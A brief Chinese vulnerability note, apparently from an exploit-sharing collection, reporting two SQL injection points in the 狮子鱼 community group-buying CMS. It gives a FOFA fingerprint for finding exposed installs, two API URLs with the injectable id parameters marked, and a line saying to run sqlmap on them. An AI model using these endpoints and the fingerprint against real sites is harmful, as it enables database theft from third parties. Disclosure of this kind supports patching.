狮子鱼社区团购系统CMS存在两处SQL注入
漏洞描述
狮子鱼社区团购系统CMS存在SQL注入
漏洞影响
狮子鱼社区团购系统
FOFA
"/seller.php?s=/Public/login"
代码审计
SQL注入(1)
http://localhost/index.php?s=api/goods/get_goods_detail&id=1* id为注入参数
SQL注入(2)
http://localhost/index.php?s=api/goods_detail&goods_id=1* id为注入参数
直接sqlmap梭哈:
